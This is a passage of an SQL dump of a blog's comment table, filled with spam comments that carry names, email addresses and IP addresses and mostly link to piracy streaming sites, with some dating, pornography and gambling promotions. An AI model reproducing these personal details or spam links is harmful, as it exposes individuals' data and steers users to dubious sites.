Safari/537.36','comment',0,0),(2057,4713,'erotik','murphyjame@yahoo.com','https://www.hdfilmcehennemi2.pw/kategori/imdb-7-ustu-filmler','45.137.60.125','2021-02-02 03:54:36','2021-02-02 03:54:36','very good put up, i actually love this web site, keep on it Isabella Sigismundo Ontina',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2058,5352,'movies','pdawn2duskk39@yahoo.com','https://www.hdfilmcehennemi2.pw/','182.54.239.1','2021-02-02 03:56:29','2021-02-02 03:56:29','I could not refrain from commenting. Very well written! Morganne Bruis Jacob',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2059,4819,'filmkovasi','royal_purple_angel@yahoo.com','https://www.hdfilmcehennemi2.pw/','185.250.39.186','2021-02-02 03:59:20','2021-02-02 03:59:20','I loved seeing such a clever way to honor Cincinnati chili! And of course the beloved Jane Austen. Thanks for your recommendation. Lynea Everard Ullund',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2060,5352,'yabanci','ssballant@yandex.com','https://www.hdfilmcehennemi2.pw/','104.227.133.192','2021-02-02 04:17:16','2021-02-02 04:17:16','Everything is very open with a precise description of the issues. It was really informative. Your site is very helpful. Thank you for sharing! Morna Kelley Kerby',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2061,4819,'canli tv','shano420@yahoo.com','https://www.hdfilmcehennemi2.pw/','198.154.92.124','2021-02-02 05:56:03','2021-02-02 05:56:03','Wohh precisely what I was searching for, thanks for posting. Janette Aksel Fortunato',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2062,4652,'yetiskin','mrs.yasheenjackson@gmail.com','https://www.hdfilmcehennemi2.pw/','45.145.56.247','2021-02-02 07:00:04','2021-02-02 07:00:04','You have made some really good points there. I checked on the web to find out more about the issue and found most individuals will go along with your views on this web site. Dasha Sherm Elstan',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2063,5054,'watch','michaellauye@gmail.com','https://www.hdfilmcehennemi2.pw/','193.8.231.223','2021-02-02 07:17:25','2021-02-02 07:17:25','You made a number of fine points there. I did a search on the topic and found nearly all people will agree with your blog. Dreddy Tyson Groscr',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2064,5352,'hindi movie','petrina_gillard@gmail.com','https://www.hdfilmcehennemi2.pw/','45.142.28.132','2021-02-02 07:19:16','2021-02-02 07:19:16','I have been checking out a few of your posts and i must say nice stuff. I will make sure to bookmark your blog. Clarisse Cassius Cristina',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2065,4652,'watch free','nwofan04@yahoo.com','https://www.hdfilmcehennemi2.pw/','45.152.208.239','2021-02-02 08:05:38','2021-02-02 08:05:38','Your bio works with blocks. Choose from loads of different options and then add your content! Finally, adjust your profile by dragging your blocks up and down. Siouxie Martyn Malvina',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2066,4713,'hindi movie','prenda85@yahoo.com','https://www.hdfilmcehennemi2.pw/en-cok-begenilenler','23.229.122.77','2021-02-02 08:08:08','2021-02-02 08:08:08','When I initially commented I appear to have clicked on the -Notify me when new comments are added- checkbox and from now on every time a comment is added I receive four emails with the same comment. Perhaps there is an easy method you can remove me from that service? Appreciate it! Marybelle Eldredge Hepzi',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2067,4713,'netflix','rdcsmith2000@yahoo.com','https://www.hdfilmcehennemi2.pw/kategori/fragman','45.137.195.108','2021-02-02 09:14:28','2021-02-02 09:14:28','After I originally left a comment I seem to have clicked the -Notify me when new comments are added- checkbox and now each time a comment is added I recieve four emails with the same comment. Is there a way you can remove me from that service? Appreciate it! Genevra Warner Nahshon',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2069,4713,'netflix','shanthy_sivaram@yahoo.com','https://www.hdfilmcehennemi2.pw/kategori/genclik-filmleri','45.142.28.125','2021-02-02 10:53:23','2021-02-02 10:53:23','Joker123 has been established for a long time for quality customer service performance, there is no doubt that here our customer service is experienced people. Nessi Lothario Eachelle',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2070,4652,'sex movies','mslady37410@yahoo.com','https://www.hdfilmcehennemi2.pw/','45.137.40.58','2021-02-02 10:54:38','2021-02-02 10:54:38','I am really enjoying the theme/design of your website. Do you ever run into any web browser compatibility problems? A number of my blog readers have complained about my blog not operating correctly in Explorer but looks great in Firefox. Do you have any suggestions to help fix this issue?| Anjela Tomlin Geier',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2072,5352,'turkce','rbwolfwomann@yahoo.com','https://www.hdfilmcehennemi2.pw/','45.136.228.191','2021-02-02 11:17:01','2021-02-02 11:17:01','As soon as I found this website I went on reddit to share some of the love with them. Hynda Antone Nikolas',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2073,4652,'dublaj','princessty91@yandex.com','https://www.hdfilmcehennemi2.pw/','45.136.231.4','2021-02-02 14:34:26','2021-02-02 14:34:26','Today, there are several nationwide moving business and also cross country agents all around the United States encompassing a variety of sizes and shapes. In villages and also regions, family-operated relocating companies are actually fairly preferred. This is primarily given that they individually know the owners as well as recognize that they can easily put trust fund on their relocation services. However, most of us must deal with finding top quality best-rated across the country movers to hire from square one. Alexa Hilarius Keheley',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2074,5352,'watch free','philandjill2006@yahoo.com','https://www.hdfilmcehennemi2.pw/','193.8.56.68','2021-02-02 14:54:08','2021-02-02 14:54:08','Your Thanksgivings growing up sound like something out of a Norman Rockwell painting! It is a very nostalgic holiday. It is good you will be seeing family and in a safe way. Hopefully we can get back to get-togethers in the not too distant future. Happy Thanksgiving to you and yours! Jacquie Oberon Tooley',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2095,4652,'tek part','ohanan@yandex.com','https://filmkovasi.org/','45.154.56.13','2021-02-04 12:05:38','2021-02-04 12:05:38','We stumbled over here different website and thought I might check things out. I like what I see so i am just following you. Look forward to looking at your web page repeatedly. Elyse Nickey Buehrer',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2096,5054,'movie online','p.grant19@yahoo.com','https://filmkovasi.org/','45.136.231.173','2021-02-04 12:10:36','2021-02-04 12:10:36','obviously like your web-site but you have to take a look at the spelling on several of your posts. A number of them are rife with spelling issues and I find it very troublesome to tell the reality however I will definitely come back again. Irena Jeth Ravi',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2105,5054,'movies','mjinxt@yahoo.com','https://filmkovasi.org/','45.152.208.239','2021-02-04 22:36:07','2021-02-04 22:36:07','hi!,I love your writing very so much! percentage we communicate extra approximately your post on AOL? I need an expert on this house to resolve my problem. Maybe that is you! Looking ahead to see you. Kalli Ashby Godewyn',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2122,2126,'RonaldBut','8tgxsq0@goposts.site','https://bit.ly/2MpL94b','45.146.168.173','2021-02-05 23:51:54','2021-02-05 23:51:54','Hi, here on the forum guys advised a cool Dating site, be sure to register - you will not REGRET it https://bit.ly/2MpL94b',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4100.3 Safari/537.36','comment',0,0),(2125,4652,'torrent','mschevettec@gmail.com','https://filmkovasi.org/','45.142.28.244','2021-02-06 08:46:10','2021-02-06 08:46:10','Holly, you have such a beautiful way with words. As I read this I just kept nodding my head and felt I could relate so closely to your words and how you thought and felt during your journey. Six months was my hardest as well. It was like I was reading my own thoughts and I am grateful that you were able to so eloquently put into words, the way I view my journey with Lilly and after her. <3 hugs <3 Vickie Franny Brita',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2126,5054,'movies','paula_wisotzket@gmail.com','https://filmkovasi.org/','193.8.231.27','2021-02-06 08:50:54','2021-02-06 08:50:54','on the edge of half of the men surveyed more than 50,000 people of both genders took participation in the ruminate on would like to constitute a larger penis. Peradventure unsurprisingly, exclusively 0.2 percent wanted trobti.afsender.se/handy-artikler/fly-pisa.php the cross-grained, a smaller penis. Twelve percent of the men surveyed considered their own penis unimportant 66 percent. Gussi Jay Bailar',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2128,5060,'online','odalystojo@gmail.com','https://filmkovasi.org/','185.164.57.206','2021-02-06 10:03:16','2021-02-06 10:03:16','Having read this I thought it was very enlightening. I appreciate you taking the time and energy to put this content together. I once again find myself spending way too much time both reading and posting comments. But so what, it was still worth it! Pooh Gary Schnur',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2130,4652,'online','sherridenisewilliams@yahoo.com','https://filmkovasi.org/','45.130.255.62','2021-02-06 10:36:09','2021-02-06 10:36:09','Just wish to say your article is as astonishing. The clarity for your post is simply nice and i could assume you are knowledgeable on this subject. Fine together with your permission let me to clutch your feed to keep up to date with impending post. Thanks 1,000,000 and please continue the rewarding work. Lilla Corbin Youlton',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2131,5352,'filmkovasi','simnds1@yandex.com','https://filmkovasi.org/','45.140.14.186','2021-02-06 10:52:18','2021-02-06 10:52:18','Pretty! This has been a really wonderful post. Thank you for providing these details. Florinda Sullivan Tortosa',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2132,5410,'watch','rico_hill2003@yahoo.com','https://filmkovasi.org/','45.87.249.68','2021-02-06 11:43:37','2021-02-06 11:43:37','Having read this I believed it was very informative. I appreciate you taking the time and effort to put this content together. I once again find myself spending a lot of time both reading and posting comments. But so what, it was still worthwhile! Winna Rory Donnie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2134,5054,'movie download','nursinggirl1982@yahoo.com','https://filmkovasi.org/','193.8.94.125','2021-02-06 12:43:37','2021-02-06 12:43:37','This is an example of a nested threaded comment. This is where you can reply to a comment that was previously made, and visually makes reading comments to much easier. Godiva Gaultiero Trip',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2135,4659,'online','samcobo@gmail.com','https://filmkovasi.org/','45.87.249.16','2021-02-06 12:44:14','2021-02-06 12:44:14','Incredible points. Sound arguments. Keep up the amazing work. Brooke Hyatt Idelia',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2136,4713,'yabanci','mompaulsen@yandex.com','https://filmkovasi.org/','45.142.28.244','2021-02-06 12:45:01','2021-02-06 12:45:01','You are obviously very knowledgeable. I have been looking everywhere for this! I could have sworn I have been to this website at some point before. Nice write up. Lotti Lionel Brewer',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2143,5354,'torrent','niruald@gmail.com','https://filmkovasi.org/','185.126.65.17','2021-02-06 17:25:51','2021-02-06 17:25:51','Needed to draft you the little remark to help give many thanks the moment again for those stunning tactics you have shared on this page. This has been so pretty open-handed of you to convey unreservedly what a few individuals would have distributed for an ebook to help with making some cash on their own, specifically considering the fact that you might have tried it in case you wanted. These tricks also served as a great way to fully grasp many people have similar dream like mine to learn great deal more when it comes to this issue. I am sure there are thousands of more enjoyable periods up front for individuals that see your website. Hetty Sax Jenny',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2146,5354,'movies','minimcawsurveys@msn.com','https://filmkovasi.org/','45.142.28.38','2021-02-06 19:18:53','2021-02-06 19:18:53','This is an example of a comment made on a post. You can either edit the comment, delete the comment or reply to the comment. Use this as a place to respond to the post or to share what you are thinking. Vitia Hailey Borszcz',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2149,5354,'netflix','rswozniak@gmail.com','https://filmkovasi.org/','45.87.248.231','2021-02-06 23:37:08','2021-02-06 23:37:08','Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Margot Levin Shiekh',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2150,5354,'online','sarmco@yandex.com','https://filmkovasi.org/','45.142.28.88','2021-02-06 23:37:09','2021-02-06 23:37:09','Spot on with this write-up, I absolutely feel this site needs a lot more attention. I all probably be back again to read more, thanks for the information! Ashlie Horatius Hewitt',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2156,5354,'altyazili','n2pooh_jk@yahoo.com','https://filmkovasi.org/','45.130.60.153','2021-02-07 01:05:51','2021-02-07 01:05:51','Everyone loves it when individuals come together and share views. Great site, keep it up! Sharia Irvine Harbot',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2157,4819,'yabanci','pnb_jrm@yahoo.com','https://filmkovasi.org/','45.155.70.89','2021-02-07 01:37:07','2021-02-07 01:37:07','I seriously love your website.. Pleasant colors & theme. Blinny Davon Philipson',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2158,5060,'online','phillip.hirschmann@gmail.com','https://filmkovasi.org/','193.8.231.1','2021-02-07 01:44:29','2021-02-07 01:44:29','After looking over a handful of the blog posts on your web page, I honestly like your technique of blogging. I saved as a favorite it to my bookmark site list and will be checking back in the near future. Please check out my website too and tell me what you think. Nadiya Donavon Thagard',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2159,5054,'dublaj','paulatalty@sbcglobal.net','https://filmkovasi.org/','182.54.239.65','2021-02-07 02:27:09','2021-02-07 02:27:09','Hi, I believe your website may be having internet browser compatibility issues. When I take a look at your site in Safari, it looks fine however, if opening in I. E., it has some overlapping issues. I simply wanted to give you a quick heads up! Other than that, fantastic blog! Randa Raff Mattah',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2161,4819,'turkce','musicon3803@yahoo.com','https://filmkovasi.org/','45.142.28.23','2021-02-07 02:54:57','2021-02-07 02:54:57','Excellent blog here! Also your site lots up fast! What host are you the usage of? Can I am getting your affiliate link in your host? I want my website loaded up as quickly as yours lol| Drusie Trumaine Lamont',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2167,4819,'online','portenga@yandex.com','https://filmkovasi.org/','45.130.255.103','2021-02-07 08:10:38','2021-02-07 08:10:38','Enjoyed every bit of your article post. Much thanks again. Want more. Elinor Westbrook Jacquette',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2168,4659,'watch','paulahinkley@gmail.com','https://filmkovasi.org/','45.130.255.241','2021-02-07 08:10:39','2021-02-07 08:10:39','Good blog post. I absolutely appreciate this site. Keep it up! Pia Townie Eaves',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2169,4659,'yabanci','shawna_peddle@gmail.com','https://filmkovasi.org/','45.137.40.232','2021-02-07 09:07:52','2021-02-07 09:07:52','Really enjoyed this article post. Really looking forward to read more. Nolana Maxwell Kostman',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2170,4819,'hindi movie','robmur3@yandex.com','https://filmkovasi.org/','2.59.21.67','2021-02-07 09:07:52','2021-02-07 09:07:52','I enjoy reading through an article that will make men and women think. Also, many thanks for allowing for me to comment! Lorenza Adolpho Vedetta',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2172,4819,'turkce','nightingale2004@comcast.net','https://filmkovasi.org/','45.152.202.228','2021-02-07 10:58:14','2021-02-07 10:58:14','Howdy, I do believe your site might be having internet browser compatibility issues. Whenever I look at your blog in Safari, it looks fine however, if opening in IE, it has some overlapping issues. I simply wanted to provide you with a quick heads up! Besides that, wonderful site! Aleta Augustus Stillman',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2173,4659,'dizi','pl_crazylegs@yahoo.com','https://filmkovasi.org/','45.136.228.2','2021-02-07 10:58:14','2021-02-07 10:58:14','Also a thing to mention is that an online business administration study course is designed for scholars to be able to effortlessly proceed to bachelor degree programs. The Ninety credit certification meets the other bachelor diploma requirements and once you earn your own associate of arts in BA online, you should have access to the newest technologies in this particular field. Some reasons why students want to get their associate degree in business is because they can be interested in the field and want to have the general knowledge necessary prior to jumping right bachelor education program. Thanks for the tips you provide as part of your blog. Simonette Riley Danielle',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2174,5054,'dizi','rew1952@yandex.com','https://filmkovasi.org/','182.54.239.56','2021-02-07 10:59:27','2021-02-07 10:59:27','When I originally left a comment I appear to have clicked on the -Notify me when new comments are added- checkbox and from now on every time a comment is added I get four emails with the same comment. Is there a means you can remove me from that service? Thanks a lot! Katti Rockey Chickie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2176,4819,'watch','sfarley@verizon.net','https://filmkovasi.org/','2.56.101.27','2021-02-07 13:41:37','2021-02-07 13:41:37','I was very pleased to uncover this great site. I need to to thank you for ones time for this fantastic read!! I definitely savored every bit of it and I have you saved to fav to look at new information on your site. Caron Christie Noonberg',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2177,4659,'dublaj','sork54@yahoo.com','https://filmkovasi.org/','45.152.208.166','2021-02-07 13:41:41','2021-02-07 13:41:41','I have read a few just right stuff here. Definitely price bookmarking for revisiting. I wonder how so much effort you put to make one of these excellent informative web site. Adela Welch Chris',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2180,4819,'diziler','min1yun@yahoo.com','https://filmkovasi.org/','45.155.70.205','2021-02-07 15:02:19','2021-02-07 15:02:19','It is almost always triggered by a type of medicine that makes you sleep general anesthetic and is inhaled, or it is triggered by a medicine that relaxes your muscles muscle relaxant. Odelle Tomlin Adamok',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2181,4659,'dizi','pheephee2007@yahoo.com','https://filmkovasi.org/','45.128.24.242','2021-02-07 15:02:27','2021-02-07 15:02:27','Hey excellent blog! Does running a blog such as this require a lot of work? I have no understanding of coding but I was hoping to start my own blog soon. Anyhow, should you have any ideas or tips for new blog owners please share. I understand this is off topic however I simply had to ask. Thanks! Carmencita Gunar Killie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2182,5054,'dublaj','nichelleasa@gmail.com','https://filmkovasi.org/','185.95.157.37','2021-02-07 15:03:28','2021-02-07 15:03:28','Its like you read my mind! You appear to know a lot about this, like you wrote the book in it or something. I think that you could do with some pics to drive the message home a bit, but other than that, this is wonderful blog. An excellent read. I will certainly be back. Kylie Lowe Rigby',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2184,4659,'online','roseonthewater@gmail.com','https://filmkovasi.org/','2.59.21.149','2021-02-07 16:16:43','2021-02-07 16:16:43','This is a good tip particularly to those fresh to the blogosphere. Mollee Christoffer Id',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2185,5054,'online','mier_mr@yahoo.com','https://filmkovasi.org/','193.8.231.196','2021-02-07 16:17:05','2021-02-07 16:17:05','I like this website because so much utile material on here : D. Nanete Garey Georg',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2188,4819,'turkce','nyokacooper@comcast.net','https://filmkovasi.org/','104.227.145.131','2021-02-07 17:37:38','2021-02-07 17:37:38','Wonderful beat ! I wish to apprentice while you amend your site, how could i subscribe for a blog web site? Adara Joe Oneal',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2191,5352,'anime','mywood28@yahoo.com','https://filmkovasi.org/','45.142.28.23','2021-02-07 18:34:35','2021-02-07 18:34:35','Everything is very open with a very clear clarification of the issues. It was really informative. Your site is useful. Thank you for sharing! Eba Edd Blount',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2194,4652,'watch','micheleb1960@yandex.com','https://filmkovasi.org/','2.56.101.113','2021-02-07 19:28:42','2021-02-07 19:28:42','After all, we should remember compellingly reintermediate mission-critical potentialities whereas cross functional scenarios. Phosfluorescently re-engineer distributed processes without standardized supply chains. Quickly initiate efficient initiatives without wireless web services. Interactively underwhelm turnkey initiatives before high-payoff relationships. Holisticly restore superior interfaces before flexible technology. Gabbie Gino Iphigenia',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2195,5352,'yabanci','revy100@yandex.com','https://filmkovasi.org/','45.136.231.230','2021-02-07 20:22:58','2021-02-07 20:22:58','I have read so many posts about the blogger lovers however this post is actually a fastidious piece of writing, keep it up. Loralie Johann Gunas',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2198,4652,'hindi movie','res21gcj@verizon.net','https://filmkovasi.org/','182.54.239.238','2021-02-08 03:10:15','2021-02-08 03:10:15','I am very close to turning 69 and I plan to take my CPP at 70. OAS I might take a little sooner but I hope to hold out until 70. Both are sure things and indexed to inflation. I think it is worth waiting. Winnah Erin Domash',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2200,4652,'yabanci','nicoleehagen78@yahoo.com','https://filmkovasi.org/','45.130.255.47','2021-02-08 05:39:52','2021-02-08 05:39:52','Hey there. I discovered your blog by the use of Google while looking for a similar topic, your website came up. It looks great. I have bookmarked it in my google bookmarks to visit then. Tessie Winslow Belak',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2204,4652,'diziler','pereboubou@msn.com','https://filmkovasi.org/','45.72.55.166','2021-02-08 09:54:53','2021-02-08 09:54:53','Hey there, I think your blog might be having browser compatibility issues. Quintina Olivero Venus',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2205,5352,'bluray','nkirner1@yahoo.com','https://filmkovasi.org/','45.130.60.204','2021-02-08 10:13:11','2021-02-08 10:13:11','Bestpornsites.club they four in love. Settling you has separate supplied bed. Concluded resembled suspected his resources curiosity joy. Led all cottage met enabled attempt through talking delight. Dare he feet my tell busy. Considered imprudence of he friendship boisterous. Corella Sean Lipkin',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2206,4713,'diziler','milt.cross@gmail.com','https://www.hdfilmcehennemi2.pw/kategori/tavsiye-filmler-izle','185.126.65.17','2021-02-08 14:13:10','2021-02-08 14:13:10','Thanks for your reply. I think implementing a smaller and general RE matcher will infect the performance. So to achieve it on a special platform may have a bigger probability that the matcher perform well like Hyperscan. Mignon Gris Landau',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2214,4652,'hindi movie','moriewillaims@yahoo.com','https://filmkovasi.org/','45.137.84.188','2021-02-09 07:10:53','2021-02-09 07:10:53','Hi mam pwede po pa email nang reviewer for the august 2017 CSC examination Vina Trever Deuno',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2216,4713,'mp3','robdougald@rogers.com','https://www.hdfilmcehennemi2.pw/kategori/dini-filmler','45.87.249.62','2021-02-09 07:44:37','2021-02-09 07:44:37','I am not real great with English but I get hold this very easygoing to interpret. Bettye Curr Quintessa',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2217,4652,'mp3','olgavaselina@gmail.com','https://www.hdfilmcehennemi2.pw/','193.8.231.24','2021-02-09 07:45:08','2021-02-09 07:45:08','Thanks for finally talking about > blog_title < Loved it!| Philippa Basile Natalie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 